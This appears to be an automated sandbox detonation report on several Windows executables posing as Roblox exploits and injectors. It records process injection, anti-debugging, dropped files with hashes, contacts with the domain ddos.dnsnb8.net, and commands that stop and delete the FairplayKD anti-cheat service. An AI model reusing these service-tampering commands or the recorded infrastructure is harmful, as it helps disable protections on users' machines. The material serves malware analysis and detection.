N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5056 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Exterm.exe C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe
PID 5056 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Exterm.exe C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe
PID 5056 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Exterm.exe C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe
PID 2724 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe
PID 2724 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe
PID 2724 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe
PID 2724 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe C:\Windows\SysWOW64\cmd.exe
PID 576 wrote to memory of 820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 576 wrote to memory of 820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 576 wrote to memory of 820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2724 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe C:\Windows\SysWOW64\cmd.exe
PID 2868 wrote to memory of 4672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2868 wrote to memory of 4672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2868 wrote to memory of 4672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2724 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe C:\Windows\SysWOW64\cmd.exe
PID 5116 wrote to memory of 4952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 5116 wrote to memory of 4952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 5116 wrote to memory of 4952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2724 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 3448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2848 wrote to memory of 3448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2848 wrote to memory of 3448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4396 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe C:\Windows\SysWOW64\cmd.exe
PID 4396 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe C:\Windows\SysWOW64\cmd.exe
PID 4396 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Exterm.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Exterm.exe"

C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe

"C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe"

C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe

C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop FairplayKD >nul

C:\Windows\SysWOW64\sc.exe

sc stop FairplayKD

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete FairplayKD >nul

C:\Windows\SysWOW64\sc.exe

sc delete FairplayKD

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop FairplayKD1 >nul

C:\Windows\SysWOW64\sc.exe

sc stop FairplayKD1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete FairplayKD1 >nul

C:\Windows\SysWOW64\sc.exe

sc delete FairplayKD1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\28f16f29.bat" "

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 ddos.dnsnb8.net udp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 8.8.8.8:53 105.84.221.44.in-addr.arpa udp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/5056-0-0x00007FFC2D8C3000-0x00007FFC2D8C5000-memory.dmp

memory/5056-1-0x0000000000BC0000-0x0000000000C96000-memory.dmp

memory/5056-5-0x00007FFC2D8C0000-0x00007FFC2E382000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe

MD5 16d4eec72ee69f6acae5a362488dcac7
SHA1 014d4b32236bc6dc648aeddf6819e1e0e62718d8
SHA256 d2d80e8ba8030df48bd0c485ec83b5bdf3c500cb84cdaca664e9fb6b1b4b6c9f
SHA512 1f320a07d98ce30f693429869830341e789c6ca2dc95d6fc148f5ddb141793cc877ad8cab9459af2caac1919a1ae245c12ce0f1ee2bed0f01c06eddb734cc61c

memory/2724-15-0x0000000000300000-0x0000000000319000-memory.dmp

memory/5056-17-0x00007FFC2D8C0000-0x00007FFC2E382000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe

MD5 56b2c3810dba2e939a8bb9fa36d3cf96
SHA1 99ee31cd4b0d6a4b62779da36e0eeecdd80589fc
SHA256 4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07
SHA512 27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

memory/4396-22-0x0000000000210000-0x0000000000219000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8TO9EJAY\k2[1].rar

MD5 d3b07384d113edec49eaa6238ad5ff00
SHA1 f1d2d2f924e986ac86fdf7b36c94bcdf32beec15
SHA256 b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c
SHA512 0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6

C:\Users\Admin\AppData\Local\Temp\64817387.exe

MD5 20879c987e2f9a916e578386d499f629
SHA1 c7b33ddcc42361fdb847036fc07e880b81935d5d
SHA256 9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31
SHA512 bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f

memory/2724-38-0x0000000000300000-0x0000000000319000-memory.dmp

memory/4396-46-0x0000000000210000-0x0000000000219000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\28f16f29.bat

MD5 98b41a3e68bb337885a2fdee8e6f5284
SHA1 fa22db051a62f12c0acc3dab0d3f56611c75c4d1
SHA256 fe94f2597c808ee5490802a2bebddcd98e22de05b3a5e768398400a1a91b1db6
SHA512 cd63838ceda384dcfd2d21823ba0418e03976857f981b307a42d28d76b0e63715b854bbcb3a972bec2f735b40469bfd883be3229ef7b7de1f4a3ac9249cd67bf

Analysis: behavioral8

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

149s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DeadlySafe.exe"

Signatures

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DeadlySafe.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DeadlySafe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DeadlySafe.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DeadlySafe.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DeadlySafe.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 201.203.100.95.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

memory/372-0-0x00007FF676BF9000-0x00007FF676F65000-memory.dmp

memory/372-2-0x00007FF9D37C0000-0x00007FF9D37C2000-memory.dmp

memory/372-1-0x00007FF9D37B0000-0x00007FF9D37B2000-memory.dmp

memory/372-3-0x00007FF676BF0000-0x00007FF6774A6000-memory.dmp

memory/372-4-0x00007FF676BF9000-0x00007FF676F65000-memory.dmp

memory/372-5-0x00007FF676BF0000-0x00007FF6774A6000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

92s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node63.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node63.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node63.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node63.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 216.203.100.95.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/1676-0-0x00000000745DE000-0x00000000745DF000-memory.dmp

memory/1676-1-0x0000000000420000-0x000000000042A000-memory.dmp

memory/1676-2-0x0000000004E30000-0x0000000004ECC000-memory.dmp

memory/1676-3-0x0000000005480000-0x0000000005A26000-memory.dmp

memory/1676-4-0x0000000004ED0000-0x0000000004F62000-memory.dmp

memory/1676-5-0x0000000004E00000-0x0000000004E0A000-memory.dmp

memory/1676-6-0x0000000005030000-0x0000000005086000-memory.dmp

memory/1676-7-0x00000000745D0000-0x0000000074D81000-memory.dmp

memory/1676-8-0x00000000745DE000-0x00000000745DF000-memory.dmp

memory/1676-9-0x00000000745D0000-0x0000000074D81000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

97s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_vbrSafe.exe"

Signatures

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_vbrSafe.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_vbrSafe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_vbrSafe.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_vbrSafe.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_vbrSafe.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

memory/3328-0-0x00007FF798AF9000-0x00007FF798E62000-memory.dmp

memory/3328-2-0x00007FFB57AC0000-0x00007FFB57AC2000-memory.dmp

memory/3328-1-0x00007FFB57AB0000-0x00007FFB57AB2000-memory.dmp

memory/3328-4-0x00007FF798AF0000-0x00007FF79939F000-memory.dmp

memory/3328-5-0x00007FF798AF9000-0x00007FF798E62000-memory.dmp

memory/3328-6-0x00007FF798AF0000-0x00007FF79939F000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

149s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\RobloxExploit.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\tmpfile-main\RobloxExploit.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\$MontanaRoblox\MontanaExecutor.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\$MontanaRoblox\MontanaExecutor.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion C:\$MontanaRoblox\MontanaExecutor.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A
N/A N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\$MontanaRoblox\MontanaExecutor.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2228 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\RobloxExploit.exe C:\$MontanaRoblox\MontanaExecutor.exe
PID 2228 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\RobloxExploit.exe C:\$MontanaRoblox\MontanaExecutor.exe

Processes

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\RobloxExploit.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\RobloxExploit.exe"

C:\$MontanaRoblox\MontanaExecutor.exe

"C:\$MontanaRoblox\MontanaExecutor.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 201.203.100.95.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

C:\$MontanaRoblox\MontanaExecutor.exe

MD5 dabf953588aa169685126dde24d55251
SHA1 b9590c74690b23299f0bad3c1efc20cafbc0c6c5
SHA256 4bb72a438218807b830f27c6525d46e840fb012b8cb40fc62c78d59e70fd0216
SHA512 541cefa2536a0e7ed3e047a08d425908f42cf8466ed4f5badbc579ea1d2a4e11feebbee9e573350209a399739ced24990124d354c634e648a091ed78f8c254ce

C:\$MontanaRoblox\MontanaExecutor.exe.config

MD5 b1f8f837fddfb84d7aeef9e31ff6b4e8
SHA1 4901c36feba3900eaa7455c5a4a983d3a0242723
SHA256 f8d8a1dd30f16ecf136589b99d47653bcde6a2d6cf7b4917001feb6d4da1d447
SHA512 7111bf52eeecf1e5cdb3f346da28902973ea1f10a588665e2a5ab3be2a71b89b7184fb24e751e9b5980f825d3120a274f0bbf67e183ef1430dd96eb7dacd5120

memory/4752-114-0x00007FFA8CFA3000-0x00007FFA8CFA5000-memory.dmp

memory/4752-115-0x000002CBCA6C0000-0x000002CBCA6DA000-memory.dmp

C:\$MontanaRoblox\Guna.UI2.dll

MD5 c19e9e6a4bc1b668d19505a0437e7f7e
SHA1 73be712aef4baa6e9dabfc237b5c039f62a847fa
SHA256 9ac8b65e5c13292a8e564187c1e7446adc4230228b669383bd7b07035ab99a82
SHA512 b6cd0af436459f35a97db2d928120c53d3691533b01e4f0e8b382f2bd81d9a9a2c57e5e2aa6ade9d6a1746d5c4b2ef6c88d3a0cf519424b34445d0d30aab61de

memory/4752-117-0x000002CBE5B00000-0x000002CBE5D14000-memory.dmp

C:\$MontanaRoblox\FastColoredTextBox.dll

MD5 4719b02693486f3610a0cba3f88e3719
SHA1 ff4335aacf19037c3879d371788650d1681e5dd1
SHA256 a19bf2722cef29430e75f09c1f7a17baf456ccaed16ec6584f417d03214598f3
SHA512 3980726c6ce280973089b38c81242ddb5f22713abb66072df43bfd58eb9d2c476540475cfae2105a2109452e5cadaca310df99d3cf673d8335f2ba0f743d9b72

memory/4752-120-0x000002CBCC430000-0x000002CBCC482000-memory.dmp

memory/4752-119-0x00007FFA8CFA0000-0x00007FFA8DA62000-memory.dmp

memory/4752-121-0x00007FFA8CFA0000-0x00007FFA8DA62000-memory.dmp

memory/4752-122-0x00007FFA8CFA0000-0x00007FFA8DA62000-memory.dmp

memory/4752-123-0x00007FFA8CFA0000-0x00007FFA8DA62000-memory.dmp

